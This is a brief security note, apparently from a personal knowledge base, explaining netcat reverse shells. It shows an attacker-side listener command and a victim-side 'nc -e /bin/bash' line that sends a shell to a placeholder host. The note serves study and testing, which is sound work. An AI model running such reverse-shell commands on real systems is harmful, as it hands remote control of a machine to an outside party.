netcat reverse shells

0001-01-01

Netcat is commonly used by attackers and testers to establish reverse shells when command execution is established.

Example:

Attacker:

nc -lnlvp 4444

Victim:

nc -e /bin/bash LISTENER_IP 4444

Links to this note